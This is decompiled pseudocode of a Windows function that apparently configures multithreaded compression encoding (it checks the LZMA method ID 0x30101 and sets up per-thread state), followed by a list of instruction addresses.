				void* _t662;
				signed int* _t663;
				void* _t664;
				void* _t668;
				void** _t669;
				void** _t670;
				void* _t672;
				void* _t673;
				void* _t677;
				void* _t680;
				signed int* _t681;
				void** _t683;
				void** _t684;
				void* _t685;
				void* _t687;
				void* _t688;

				L00B7F140(E00B842C9, _t685);
				_t688 = _t687 - 0xe8;
				 *((char*)(_t685 - 0x1d)) = __ecx;
				_push( *((intOrPtr*)(_t685 + 0x14)));
				_t653 = __edx;
				L00B2DAEA(_t685 - 0xf4, __eflags);
				_t672 = 0;
				_t637 = 1;
				 *(_t685 - 4) = 0;
				_t408 = E00B1A578(_t685 - 0xe8, 1, _t685 - 0x68, _t685 - 0xa4, _t685 - 0x39);
				 *((intOrPtr*)(_t685 - 0xa8)) = _t408;
				if(_t408 >= 0) {
					_t409 = 1;
					__eflags =  *((intOrPtr*)(_t685 - 0xa4)) - _t409;
					if( *((intOrPtr*)(_t685 - 0xa4)) == _t409) {
						__eflags =  *((char*)(_t685 - 0x1d));
						_t539 = _t653;
						 *(_t685 - 0x1c) = _t409;
						 *(_t685 - 0x18) = _t539;
						if( *((char*)(_t685 - 0x1d)) == 0) {
							L13:
							__eflags = _t539 - 1;
							if(_t539 > 1) {
								L16:
								 *(_t685 + 0x17) = 1;
								L17:
								_push( *(_t685 - 0x18));
								L00B2D917(_t685 - 0x14);
								_t540 =  *(_t685 - 0x14);
								__eflags =  *(_t685 - 0x18) - _t672;
								 *(_t685 - 4) = 1;
								 *(_t685 - 0x60) = _t540;
								 *(_t685 - 0x10) = _t672;
								if( *(_t685 - 0x18) <= _t672) {
									L34:
									_t549 =  *(_t685 + 0x1c);
									_t654 =  *(_t685 + 0x18);
									__eflags =  *(_t685 + 0x1c) - _t672;
									 *(_t685 - 0x24) = _t672;
									if( *(_t685 + 0x1c) != _t672) {
										_t637 = _t654;
										 *(_t685 - 0x24) = E00B7E140(_t549, _t654);
									}
									__eflags =  *(_t685 - 0x18) - _t672;
									if( *(_t685 - 0x18) <= _t672) {
										L40:
										E00B78010(_t685 - 0x5c);
										 *(_t685 - 4) = 4;
										 *(_t685 - 0x44) = _t672;
										 *(_t685 - 0x40) = 1;
										L00B2D790(_t685 - 0x34);
										 *(_t685 - 0x28) =  *(_t685 - 0x28) & 0x00000000;
										 *(_t685 - 0x2c) = _t672;
										__eflags =  *(_t685 + 0x17);
										 *(_t685 - 4) = 5;
										if( *(_t685 + 0x17) == 0) {
											L58:
											__eflags =  *(_t685 - 0x18) - _t672;
											 *(_t685 - 0x10) = _t672;
											if( *(_t685 - 0x18) <= _t672) {
												L74:
												_t552 =  *(_t685 + 0x24);
												__eflags = _t552 - _t672;
												if(_t552 == _t672) {
													L76:
													__eflags =  *(_t685 + 0x17);
													if( *(_t685 + 0x17) == 0) {
														_t655 = E00B28745(_t540);
														__eflags = _t655 - _t672;
														if(_t655 != _t672) {
															L45:
															 *(_t685 - 4) = 4;
															_t554 = _t685 - 0x38;
															L144:
															L00B2DABF(_t554);
															DeleteCriticalSection(_t685 - 0x5c);
															_t555 =  *(_t685 - 0x14);
															 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
															__eflags =  *(_t685 - 0x14) - _t672;
															if( *(_t685 - 0x14) != _t672) {
																L00B29765(_t555, _t655, _t685, 3);
															}
															_t673 = _t655;
															goto L150;
														}
														__eflags =  *(_t685 - 0x44) - _t672;
														if(__eflags == 0) {
															L91:
															 *(_t685 - 0x70) = _t672;
															 *(_t685 - 0x6c) = _t672;
															_push(_t685 - 0xa0);
															L00B27A55( *((intOrPtr*)(_t540 + 0x44)) + 8, _t637, __eflags);
															_t560 =  *(_t685 - 0x18);
															 *(_t685 - 0x80) = _t672;
															 *(_t685 - 0x7c) = _t672;
															 *(_t685 - 0x78) = _t672;
															 *(_t685 - 0x74) = _t672;
															 *(_t685 - 0x70) =  *(_t540 + 0x58);
															__eflags = _t560 - _t672;
															 *(_t685 - 0x6c) =  *(_t540 + 0x5c);
															if(_t560 <= _t672) {
																L94:
																_t638 = _t685 - 0xa0;
																_t655 =  *((intOrPtr*)( *( *(_t685 + 0x28))))(_t638, 1);
																__eflags = _t655 - _t672;
																if(_t655 != _t672) {
																	goto L45;
																}
																 *(_t685 - 0x40) =  *(_t685 - 0x40) & 0x00000000;
																_t426 =  *(_t685 - 0x1c) *  *(_t685 - 0x18);
																__eflags = _t426 - 1;
																 *(_t685 - 0x44) = _t672;
																 *(_t685 + 0x18) = _t426;
																if(_t426 > 1) {
																	L98:
																	 *(_t685 + 0x1f) = 1;
																	L99:
																	__eflags =  *(_t685 - 0x18) - _t672;
																	 *(_t685 - 0x10) = _t672;
																	if( *(_t685 - 0x18) <= _t672) {
																		L117:
																		__eflags =  *(_t685 + 0x1f);
																		if( *(_t685 + 0x1f) == 0) {
																			L139:
																			_t655 =  *(_t685 - 0x44);
																			__eflags = _t655 - _t672;
																			if(__eflags != 0) {
																				goto L45;
																			}
																			_push(_t685 - 0xa0);
																			L00B27A55( *((intOrPtr*)(_t540 + 0x44)) + 8, _t638, __eflags);
																			 *(_t685 - 0x80) = _t672;
																			 *(_t685 - 0x7c) = _t672;
																			 *(_t685 - 0x78) = _t672;
																			 *(_t685 - 0x74) = _t672;
																			_t429 = L00B7F440( *(_t685 - 0x1c), _t672,  *(_t540 + 0x58),  *(_t540 + 0x5c));
																			_t564 =  *(_t685 - 0x18);
																			 *(_t685 - 0x70) = _t429;
																			__eflags = _t564 - _t672;
																			 *(_t685 - 0x6c) = _t638;
																			if(_t564 <= _t672) {
																				L143:
																				_t655 =  *((intOrPtr*)( *( *(_t685 + 0x28)) + 4))(_t685 - 0xa0, 1);
																				 *(_t685 - 4) = 4;
																				__eflags = _t655 - _t672;
																				_t554 = _t685 - 0x38;
																				if(_t655 == _t672) {
																					L00B2DABF(_t554);
																					DeleteCriticalSection(_t685 - 0x5c);
																					_t566 =  *(_t685 - 0x14);
																					 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																					__eflags =  *(_t685 - 0x14) - _t672;
																					if( *(_t685 - 0x14) != _t672) {
																						L00B29765(_t566, _t655, _t685, 3);
																					}
																					_t673 = 0;
																					__eflags = 0;
																					goto L150;
																				}
																				goto L144;
																			}
																			_t435 = _t540 + 0x100;
																			do {
																				 *(_t685 - 0x80) =  *(_t685 - 0x80) +  *((intOrPtr*)(_t435 - 4));
																				asm("adc [ebp-0x7c], esi");
																				 *(_t685 - 0x78) =  *(_t685 - 0x78) +  *_t435;
																				asm("adc [ebp-0x74], esi");
																				_t435 = _t435 + 0x190;
																				_t564 = _t564 - 1;
																				__eflags = _t564;
																			} while (_t564 != 0);
																			goto L143;
																		}
																		__eflags =  *(_t685 - 0x18) - _t672;
																		 *(_t685 + 0x10) = _t672;
																		 *(_t685 + 0x2c) = _t672;
																		if( *(_t685 - 0x18) <= _t672) {
																			goto L139;
																		}
																		_t657 = _t540;
																		 *(_t685 + 0x18) =  *(_t685 - 0x18);
																		do {
																			__eflags =  *(_t685 - 0x1c) - _t672;
																			 *(_t685 + 0x1c) = _t672;
																			if( *(_t685 - 0x1c) <= _t672) {
																				goto L128;
																			} else {
																				goto L121;
																			}
																			do {
																				L121:
																				_t438 = E00B77DB0(_t657 +  *(_t685 + 0x1c) * 4);
																				__eflags =  *(_t685 + 0x10) - _t672;
																				if( *(_t685 + 0x10) == _t672) {
																					__eflags = _t438 - _t672;
																					if(_t438 != _t672) {
																						 *(_t685 + 0x10) = _t438;
																					}
																				}
																				_t568 =  *(_t685 + 0x1c);
																				__eflags =  *(_t685 + 0x2c) - _t672;
																				_t439 =  *(_t657 + 0xe0 + _t568 * 4);
																				if( *(_t685 + 0x2c) == _t672) {
																					__eflags = _t439 - _t672;
																					if(_t439 != _t672) {
																						 *(_t685 + 0x2c) = _t439;
																					}
																				}
																				_t569 = _t568 + 1;
																				__eflags = _t569 -  *(_t685 - 0x1c);
																				 *(_t685 + 0x1c) = _t569;
																			} while (_t569 <  *(_t685 - 0x1c));
																			L128:
																			_t657 = _t657 + 0x190;
																			_t342 = _t685 + 0x18;
																			 *_t342 =  *(_t685 + 0x18) - 1;
																			__eflags =  *_t342;
																		} while ( *_t342 != 0);
																		_t440 =  *(_t685 + 0x10);
																		__eflags = _t440 - _t672;
																		if(__eflags != 0) {
																			L42:
																			if(__eflags > 0) {
																				_t440 = _t440 & 0x0000ffff | 0x80070000;
																				__eflags = _t440;
																			}
																			_t655 = _t440;
																			goto L45;
																		}
																		__eflags =  *(_t685 + 0x2c) - _t672;
																		if( *(_t685 + 0x2c) == _t672) {
																			goto L139;
																		}
																		 *(_t685 - 4) = 4;
																		L00B2DABF(_t685 - 0x38);
																		DeleteCriticalSection(_t685 - 0x5c);
																		_t571 =  *(_t685 - 0x14);
																		 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																		__eflags =  *(_t685 - 0x14) - _t672;
																		if( *(_t685 - 0x14) != _t672) {
																			L00B29765(_t571, _t657, _t685, 3);
																		}
																		_t673 =  *(_t685 + 0x2c);
																		goto L150;
																	} else {
																		goto L100;
																	}
																	do {
																		L100:
																		_t677 = _t540 +  *(_t685 - 0x10) * 0x190;
																		__eflags =  *(_t685 - 0x10);
																		if(__eflags != 0) {
																			 *(_t677 + 0x58) =  *(_t540 + 0x58);
																			 *(_t677 + 0x5c) =  *(_t540 + 0x5c);
																		} else {
																			 *((intOrPtr*)(_t685 - 0xb0)) =  *((intOrPtr*)(_t677 + 0x100));
																			_t638 = 0;
																			_t455 = L00B27DC9( *((intOrPtr*)( *(_t685 + 0x2c) + 0xc)),  *((intOrPtr*)(_t677 + 0xfc)), 0);
																			_t458 = L00B27DC9( *((intOrPtr*)( *(_t685 + 0x2c) + 8)),  *((intOrPtr*)(_t685 - 0xb0)), 0);
																			asm("adc ebx, edx");
																			 *(_t677 + 0x58) = L00B2DA85(0, _t455 + _t458, 0,  *((intOrPtr*)(_t685 + 8)),  *((intOrPtr*)(_t685 + 0xc)));
																			_t460 =  *((intOrPtr*)(_t677 + 0x44));
																			 *(_t677 + 0x5c) = 0;
																			 *(_t460 + 0x5c) =  *(_t685 + 0x28);
																			 *(_t460 + 0x38) =  *(_t685 + 0x18);
																			 *(_t460 + 0x3c) =  *(_t460 + 0x3c) & 0x00000000;
																			L00B279AA(_t460 + 8, 0, __eflags);
																			_t540 =  *(_t685 - 0x60);
																		}
																		_t447 = L00B1DD5D(_t685 - 0xf4, __eflags);
																		__eflags = _t447;
																		if(_t447 <= 0) {
																			_t447 = 1;
																		}
																		__eflags =  *(_t685 + 0x1f);
																		 *(_t677 + 0xc) = _t447;
																		if( *(_t685 + 0x1f) == 0) {
																			_push(0);
																			_t673 = E00B28C72(_t677);
																			__eflags = _t673;
																			if(_t673 != 0) {
																				L137:
																				 *(_t685 - 4) = 4;
																				L00B2DABF(_t685 - 0x38);
																				DeleteCriticalSection(_t685 - 0x5c);
																				_t575 =  *(_t685 - 0x14);
																				 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																				__eflags =  *(_t685 - 0x14);
																				if( *(_t685 - 0x14) != 0) {
																					L00B29765(_t575, 0, _t685, 3);
																				}
																				goto L150;
																			}
																		} else {
																			__eflags =  *(_t685 - 0x1c);
																			 *(_t685 + 0x10) = 0;
																			if( *(_t685 - 0x1c) <= 0) {
																				goto L115;
																			}
																			_t662 =  *(_t685 - 0x10) *  *(_t685 - 0x1c);
																			__eflags = _t662;
																			while(1) {
																				__eflags =  *(_t685 - 0x10);
																				if( *(_t685 - 0x10) == 0) {
																					__eflags =  *(_t685 + 0x10);
																					if( *(_t685 + 0x10) == 0) {
																						_push(1);
																						_pop(0);
																					}
																				}
																				_t638 = (_t662 +  *(_t685 + 0x10)) * 0x00000150 & 0x000007ff;
																				_t463 = L00B2D870(_t677,  *(_t685 + 0x10), 0, _t638);
																				__eflags = _t463;
																				 *(_t685 + 0x24) = _t463;
																				if(_t463 != 0) {
																					break;
																				}
																				 *(_t685 + 0x10) =  *(_t685 + 0x10) + 1;
																				__eflags =  *(_t685 + 0x10) -  *(_t685 - 0x1c);
																				if( *(_t685 + 0x10) <  *(_t685 - 0x1c)) {
																					continue;
																				}
																				goto L115;
																			}
																			 *(_t685 - 4) = 4;
																			L00B2DABF(_t685 - 0x38);
																			DeleteCriticalSection(_t685 - 0x5c);
																			_t585 =  *(_t685 - 0x14);
																			 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																			__eflags =  *(_t685 - 0x14);
																			if( *(_t685 - 0x14) != 0) {
																				L00B29765(_t585, _t662, _t685, 3);
																			}
																			_t673 =  *(_t685 + 0x24);
																			goto L150;
																		}
																		L115:
																		 *(_t685 - 0x10) =  *(_t685 - 0x10) + 1;
																		__eflags =  *(_t685 - 0x10) -  *(_t685 - 0x18);
																	} while ( *(_t685 - 0x10) <  *(_t685 - 0x18));
																	_t672 = 0;
																	__eflags = 0;
																	goto L117;
																}
																__eflags =  *( *(_t685 + 0x10)) - _t672;
																if( *( *(_t685 + 0x10)) != _t672) {
																	goto L98;
																}
																 *(_t685 + 0x1f) =  *(_t685 + 0x1f) & 0x00000000;
																goto L99;
															}
															_t469 = _t540 + 0x100;
															do {
																 *(_t685 - 0x80) =  *(_t685 - 0x80) +  *((intOrPtr*)(_t469 - 4));
																asm("adc [ebp-0x7c], esi");
																 *(_t685 - 0x78) =  *(_t685 - 0x78) +  *_t469;
																asm("adc [ebp-0x74], esi");
																_t469 = _t469 + 0x190;
																_t560 = _t560 - 1;
																__eflags = _t560;
															} while (_t560 != 0);
															goto L94;
														}
														L90:
														_t655 =  *(_t685 - 0x44);
														goto L45;
													}
													__eflags =  *(_t685 - 0x18) - _t672;
													 *(_t685 - 0x10) = _t672;
													if(__eflags <= 0) {
														L82:
														L00B279AA( *((intOrPtr*)(_t540 + 0x44)) + 8, _t637, __eflags);
														_t440 = L00B298C6(_t685 - 0x38, _t672);
														__eflags =  *(_t685 - 0x44) - _t672;
														if( *(_t685 - 0x44) != _t672) {
															goto L90;
														}
														__eflags = _t440 - _t672;
														if(__eflags == 0) {
															goto L91;
														}
														goto L42;
													}
													_t663 = _t540 + 0xe0;
													while(1) {
														_t440 = L00B77D90( *((intOrPtr*)(_t663 - 0xd8)));
														__eflags = _t440 - _t672;
														if(__eflags != 0) {
															goto L42;
														}
														_t472 =  *_t663;
														__eflags = _t472 - _t672;
														 *(_t685 + 0x1c) = _t472;
														if(_t472 != _t672) {
															 *(_t685 - 4) = 4;
															L00B2DABF(_t685 - 0x38);
															DeleteCriticalSection(_t685 - 0x5c);
															_t590 =  *(_t685 - 0x14);
															 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
															__eflags =  *(_t685 - 0x14) - _t672;
															if( *(_t685 - 0x14) != _t672) {
																L00B29765(_t590, _t663, _t685, 3);
															}
															_t673 =  *(_t685 + 0x1c);
															goto L150;
														}
														 *(_t685 - 0x10) =  *(_t685 - 0x10) + 1;
														_t663 =  &(_t663[0x64]);
														__eflags =  *(_t685 - 0x10) -  *(_t685 - 0x18);
														if(__eflags < 0) {
															continue;
														}
														goto L82;
													}
													goto L42;
												}
												_t655 =  *((intOrPtr*)( *_t552 + 8))();
												__eflags = _t655 - _t672;
												if(_t655 != _t672) {
													goto L45;
												}
												goto L76;
											} else {
												goto L59;
											}
											do {
												L59:
												_t637 =  *(_t685 + 0x18);
												_t479 = 0;
												_t680 = _t540 +  *(_t685 - 0x10) * 0x190;
												__eflags = 0;
												if(0 > 0) {
													L63:
													 *((intOrPtr*)(_t680 + 0x58)) = L00B2DA85(_t637, L00B27DC9( *((intOrPtr*)( *(_t685 + 0x2c) + 4)), _t637, _t479), _t637,  *((intOrPtr*)(_t685 + 8)),  *((intOrPtr*)(_t685 + 0xc)));
													 *(_t680 + 0x5c) = _t637;
													_t484 =  *(0xb9ea60 + ( *(_t685 - 0x10) & 0x000000ff) * 4);
													_t172 = _t680 + 0x4c; // 0x4c
													_t664 = _t172;
													 *(_t680 + 0x60) = _t484;
													_t597 =  *0x00B9EA60 << 0x00000003 ^ _t484;
													__eflags = _t597;
													 *(_t680 + 0x60) = _t597;
													 *(_t685 + 0x20) = 2;
													 *((intOrPtr*)(_t680 + 0x68)) =  *((intOrPtr*)( *(_t685 + 0x2c) + 0x10));
													do {
														_push(0x60);
														_t487 = E00B11E55();
														__eflags = _t487;
														if(_t487 == 0) {
															_t186 = _t685 + 0x1c;
															 *_t186 =  *(_t685 + 0x1c) & 0x00000000;
															__eflags =  *_t186;
														} else {
															 *(_t685 + 0x1c) = _t487;
															 *((intOrPtr*)(_t487 + 4)) = 0;
															 *((intOrPtr*)(_t487 + 0x38)) = 0;
															 *((intOrPtr*)(_t487 + 0x3c)) = 0;
															 *((intOrPtr*)(_t487 + 0x5c)) = 0;
															 *_t487 = 0xb8adcc;
														}
														 *(_t664 - 8) =  *(_t685 + 0x1c);
														E00B1A98B(_t664,  *(_t685 + 0x1c));
														_t664 = _t664 + 4;
														_t192 = _t685 + 0x20;
														 *_t192 =  *(_t685 + 0x20) - 1;
														__eflags =  *_t192;
														 *((intOrPtr*)( *(_t685 + 0x1c) + 0x58)) = _t685 - 0x5c;
													} while ( *_t192 != 0);
													__eflags =  *(_t685 - 0x10);
													if( *(_t685 - 0x10) == 0) {
														_t498 =  *((intOrPtr*)(_t680 + 0x44));
														 *(_t498 + 0x5c) =  *(_t685 + 0x28);
														 *(_t498 + 0x38) =  *(_t685 - 0x18);
														_t201 = _t498 + 0x3c;
														 *_t201 =  *(_t498 + 0x3c) & 0x00000000;
														__eflags =  *_t201;
													}
													__eflags =  *(_t685 + 0x17);
													if( *(_t685 + 0x17) != 0) {
														__eflags =  *(_t685 - 0x18) - 1;
														 *(_t680 + 0x64) =  *(_t685 - 0x10) * 0x00000150 & 0x000007ff;
														_t495 = _t685 - 0x34;
														 *(_t680 + 0x10) = _t495;
														 *((char*)(_t680 + 0x38)) = _t495 & 0xffffff00 |  *(_t685 - 0x18) - 0x00000001 > 0x00000000;
														_t673 = L00B2D79A(_t680);
														__eflags = _t673;
														if(_t673 != 0) {
															goto L137;
														}
													}
													goto L72;
												}
												if(0 < 0) {
													L62:
													_t479 = 0;
													__eflags = 0;
													_t637 = 0x64;
													goto L63;
												}
												__eflags = _t637 - 0x64;
												if(_t637 >= 0x64) {
													goto L63;
												}
												goto L62;
												L72:
												 *(_t685 - 0x10) =  *(_t685 - 0x10) + 1;
												__eflags =  *(_t685 - 0x10) -  *(_t685 - 0x18);
											} while ( *(_t685 - 0x10) <  *(_t685 - 0x18));
											_t672 = 0;
											__eflags = 0;
											goto L74;
										}
										_t637 = 0;
										_t440 = L00B77EF0(_t685 - 0x30, 0);
										__eflags = _t440 - _t672;
										if(__eflags == 0) {
											 *(_t685 - 0x28) = 1;
											 *(_t685 - 0x2c) =  *(_t685 - 0x18);
											 *((intOrPtr*)(_t685 - 0x38)) = _t685 - 0x14;
											goto L58;
										}
										goto L42;
									} else {
										_t681 = _t540 + 0x164;
										 *(_t685 - 0x10) =  *(_t685 - 0x18);
										do {
											L00B2DB37( &(_t681[1]), _t685 - 0xf4);
											_t681[0xa] = _t654;
											 *_t681 =  *(_t685 + 0x20);
											 *(_t681 - 0x5c) =  *(_t685 + 0x1c);
											 *(_t681 - 0x68) = _t654;
											 *(_t681 - 0x6c) =  *(_t685 - 0x24);
											_t681 =  &(_t681[0x64]);
											_t114 = _t685 - 0x10;
											 *_t114 =  *(_t685 - 0x10) - 1;
											__eflags =  *_t114;
										} while ( *_t114 != 0);
										_t672 = 0;
										__eflags = 0;
										goto L40;
									}
								}
								_t543 = _t540 + 0xf4;
								__eflags = _t543;
								while(1) {
									_t508 =  *(_t685 - 0x10);
									 *(_t543 - 0xe0) = _t508;
									asm("sbb ecx, ecx");
									 *(_t685 - 0xd0) =  *(_t685 - 0xd0) & 0x00000000;
									 *(_t685 - 0xcc) =  *(_t685 - 0xcc) & 0x00000000;
									 *(_t543 - 4) =  !( ~_t508) &  *(_t685 + 0x28);
									 *_t543 =  *(_t685 + 0x24);
									_t612 = 7;
									 *(_t543 - 0xdc) =  *(_t685 - 0x1c);
									memcpy(_t543 - 0xd8,  *(_t685 + 0x10), _t612 << 2);
									_t688 = _t688 + 0xc;
									_t683 = _t543 - 0xb4;
									 *(_t685 - 4) = 2;
									_t668 = E00B1A6D9( *((intOrPtr*)(_t685 - 0xa8)), 1, _t683, _t685 - 0xd0);
									__eflags = _t668;
									if(_t668 != 0) {
										break;
									}
									_t669 = _t543 - 0xb8;
									E00B1A98B(_t669,  *(_t685 - 0xd0));
									__eflags =  *_t669;
									if( *_t669 != 0) {
										L22:
										 *(_t685 - 4) = 1;
										E00B1A8EF(_t685 - 0xd0);
										_push(0x11);
										_t647 = 0x10;
										L00B2DAD2(_t543 - 0x68, _t647);
										_push(0x33);
										_t648 = 0x20;
										L00B2DAD2(_t543 - 0x88, _t648);
										_t622 = _t543 - 0x58;
										_push(0x7b);
										_t649 = 0x10;
										L00B2DAD2(_t622, _t649);
										 *(_t685 - 0x24) =  *(_t685 - 0x24) & 0x00000000;
										__eflags =  *(_t685 - 0x1c);
										if(__eflags <= 0) {
											L28:
											_t521 =  *(_t685 + 0x2c);
											__eflags =  *((intOrPtr*)(_t521 + 4)) - 0x1e;
											_t623 = _t622 & 0xffffff00 |  *((intOrPtr*)(_t521 + 4)) - 0x0000001e > 0x00000000;
											 *(_t543 - 0x48) = _t623;
											 *(_t543 - 0x47) = _t623;
											_t624 = 1;
											 *(_t543 - 0x44) = _t624;
											_t637 =  *((intOrPtr*)(_t521 + 0xc)) +  *((intOrPtr*)(_t521 + 8));
											__eflags =  *((intOrPtr*)(_t521 + 0xc)) +  *((intOrPtr*)(_t521 + 8)) - 0x1e;
											if( *((intOrPtr*)(_t521 + 0xc)) +  *((intOrPtr*)(_t521 + 8)) <= 0x1e) {
												 *(_t543 - 0x44) = 2;
											}
											__eflags =  *(_t685 + 0x1c);
											if( *(_t685 + 0x1c) != 0) {
												 *(_t543 - 0x47) = 1;
												 *(_t543 - 0x44) = _t624;
											}
											 *(_t685 - 0x10) =  *(_t685 - 0x10) + 1;
											_t543 = _t543 + 0x190;
											__eflags =  *(_t685 - 0x10) -  *(_t685 - 0x18);
											if( *(_t685 - 0x10) <  *(_t685 - 0x18)) {
												continue;
											} else {
												_t540 =  *(_t685 - 0x60);
												_t672 = 0;
												__eflags = 0;
												goto L34;
											}
										}
										_t670 = _t543 - 0x18;
										_t684 = _t543 - 0x20;
										while(1) {
											 *(_t685 - 0xc0) =  *(_t685 - 0xc0) & 0x00000000;
											 *(_t685 - 0xbc) =  *(_t685 - 0xbc) & 0x00000000;
											 *(_t685 - 4) = 3;
											_t524 = E00B1A7DD(0, _t670, __eflags,  *((intOrPtr*)(_t685 - 0x68)),  *(_t685 - 0x64), _t685 - 0xc0);
											__eflags = _t524;
											 *(_t685 - 0xac) = _t524;
											if(_t524 != 0) {
												break;
											}
											E00B1A98B(_t684,  *(_t685 - 0xc0));
											__eflags =  *_t670;
											if( *_t670 != 0) {
												L27:
												_t622 = _t685 - 0xc0;
												 *(_t685 - 4) = 1;
												E00B1A8EF(_t622);
												 *(_t685 - 0x24) =  *(_t685 - 0x24) + 1;
												_t684 =  &(_t684[1]);
												__eflags =  *(_t685 - 0x24) -  *(_t685 - 0x1c);
												if(__eflags < 0) {
													continue;
												}
												goto L28;
											}
											__eflags =  *_t684;
											if( *_t684 == 0) {
												 *(_t685 - 4) = 1;
												E00B1A8EF(_t685 - 0xc0);
												_t630 =  *(_t685 - 0x14);
												 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
												__eflags =  *(_t685 - 0x14);
												if( *(_t685 - 0x14) != 0) {
													L00B29765(_t630, _t670, _t685, 3);
												}
												goto L1;
											}
											goto L27;
										}
										 *(_t685 - 4) = 1;
										E00B1A8EF(_t685 - 0xc0);
										_t627 =  *(_t685 - 0x14);
										 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
										__eflags =  *(_t685 - 0x14);
										if( *(_t685 - 0x14) != 0) {
											L00B29765(_t627, _t670, _t685, 3);
										}
										_t673 =  *(_t685 - 0xac);
										goto L150;
									}
									__eflags =  *_t683;
									if( *_t683 == 0) {
										 *(_t685 - 4) = 1;
										E00B1A8EF(_t685 - 0xd0);
										_t632 =  *(_t685 - 0x14);
										 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
										__eflags =  *(_t685 - 0x14);
										if( *(_t685 - 0x14) != 0) {
											L00B29765(_t632, _t669, _t685, 3);
										}
										_t668 = 0x80004001;
										L51:
										 *(_t685 - 4) =  *(_t685 - 4) | 0xffffffff;
										L00B298A8(_t685 - 0xf4);
										_t417 = _t668;
										goto L151;
									}
									goto L22;
								}
								 *(_t685 - 4) = 1;
								E00B1A8EF(_t685 - 0xd0);
								_t616 =  *(_t685 - 0x14);
								 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
								__eflags =  *(_t685 - 0x14);
								if( *(_t685 - 0x14) != 0) {
									L00B29765(_t616, _t668, _t685, 3);
								}
								goto L51;
							}
							L14:
							__eflags =  *( *(_t685 + 0x10)) - _t672;
							if( *( *(_t685 + 0x10)) != _t672) {
								goto L16;
							}
							 *(_t685 + 0x17) =  *(_t685 + 0x17) & 0x00000000;
							goto L17;
						}
						__eflags =  *((intOrPtr*)(_t685 - 0x68)) - 0x30101;
						if( *((intOrPtr*)(_t685 - 0x68)) != 0x30101) {
							goto L13;
						}
						__eflags =  *(_t685 - 0x64);
						if( *(_t685 - 0x64) == 0) {
							__eflags = _t653 - _t409;
							if(__eflags == 0) {
								__eflags = L00B1DD5D(_t685 - 0xf4, __eflags);
								if(__eflags < 0) {
									L00B1D1F6(_t685 - 0xf4, 0xd, 1);
								}
							}
							_t535 = L00B1DD30(_t685 - 0xf4, __eflags);
							__eflags = _t653 - 1;
							if(_t653 <= 1) {
								goto L14;
							}
							__eflags = _t535 - 1;
							if(_t535 > 1) {
								 *(_t685 - 0x1c) = 2;
								_t539 = _t653 + 1 >> 1;
								__eflags = _t539;
								 *(_t685 - 0x18) = _t539;
							}
						}
						goto L13;
					} else {
						_t673 = 0x80070057;
						L150:
						 *(_t685 - 4) =  *(_t685 - 4) | 0xffffffff;
						L00B298A8(_t685 - 0xf4);
						_t417 = _t673;
						L151:
						 *[fs:0x0] =  *((intOrPtr*)(_t685 - 0xc));
						return _t417;
					}
				}
				L1:
				_t673 = 0x80004001;
				goto L150;
			}



































































                                                                                                                    0x00b2cdc2
                                                                                                                    0x00b2cdc7
                                                                                                                    0x00b2cdd0
                                                                                                                    0x00b2cdd3
                                                                                                                    0x00b2cdd6
                                                                                                                    0x00b2cdde
                                                                                                                    0x00b2cde6
                                                                                                                    0x00b2cdf4
                                                                                                                    0x00b2cdfc
                                                                                                                    0x00b2cdff
                                                                                                                    0x00b2ce06
                                                                                                                    0x00b2ce0c
                                                                                                                    0x00b2ce1a
                                                                                                                    0x00b2ce1b
                                                                                                                    0x00b2ce21
                                                                                                                    0x00b2ce2d
                                                                                                                    0x00b2ce31
                                                                                                                    0x00b2ce33
                                                                                                                    0x00b2ce36
                                                                                                                    0x00b2ce39
                                                                                                                    0x00b2ce8f
                                                                                                                    0x00b2ce8f
                                                                                                                    0x00b2ce92
                                                                                                                    0x00b2cea1
                                                                                                                    0x00b2cea1
                                                                                                                    0x00b2cea5
                                                                                                                    0x00b2cea5
                                                                                                                    0x00b2ceab
                                                                                                                    0x00b2ceb0
                                                                                                                    0x00b2ceb3
                                                                                                                    0x00b2ceb6
                                                                                                                    0x00b2ceba
                                                                                                                    0x00b2cebd
                                                                                                                    0x00b2cec0
                                                                                                                    0x00b2d05d
                                                                                                                    0x00b2d05d
                                                                                                                    0x00b2d060
                                                                                                                    0x00b2d063
                                                                                                                    0x00b2d065
                                                                                                                    0x00b2d068
                                                                                                                    0x00b2d06a
                                                                                                                    0x00b2d071
                                                                                                                    0x00b2d071
                                                                                                                    0x00b2d074
                                                                                                                    0x00b2d077
                                                                                                                    0x00b2d0b8
                                                                                                                    0x00b2d0bb
                                                                                                                    0x00b2d0c3
                                                                                                                    0x00b2d0c7
                                                                                                                    0x00b2d0ca
                                                                                                                    0x00b2d0ce
                                                                                                                    0x00b2d0d3
                                                                                                                    0x00b2d0d7
                                                                                                                    0x00b2d0da
                                                                                                                    0x00b2d0de
                                                                                                                    0x00b2d0e2
                                                                                                                    0x00b2d1d9
                                                                                                                    0x00b2d1d9
                                                                                                                    0x00b2d1dc
                                                                                                                    0x00b2d1df
                                                                                                                    0x00b2d308
                                                                                                                    0x00b2d308
                                                                                                                    0x00b2d30b
                                                                                                                    0x00b2d30d
                                                                                                                    0x00b2d31e
                                                                                                                    0x00b2d31e
                                                                                                                    0x00b2d322
                                                                                                                    0x00b2d3bc
                                                                                                                    0x00b2d3be
                                                                                                                    0x00b2d3c0
                                                                                                                    0x00b2d108
                                                                                                                    0x00b2d108
                                                                                                                    0x00b2d10c
                                                                                                                    0x00b2d726
                                                                                                                    0x00b2d726
                                                                                                                    0x00b2d72f
                                                                                                                    0x00b2d735
                                                                                                                    0x00b2d738
                                                                                                                    0x00b2d73c
                                                                                                                    0x00b2d73e
                                                                                                                    0x00b2d742
                                                                                                                    0x00b2d742
                                                                                                                    0x00b2d747
                                                                                                                    0x00000000
                                                                                                                    0x00b2d747
                                                                                                                    0x00b2d3c6
                                                                                                                    0x00b2d3c9
                                                                                                                    0x00b2d3d3
                                                                                                                    0x00b2d3d3
                                                                                                                    0x00b2d3d6
                                                                                                                    0x00b2d3e2
                                                                                                                    0x00b2d3e6
                                                                                                                    0x00b2d3eb
                                                                                                                    0x00b2d3ee
                                                                                                                    0x00b2d3f1
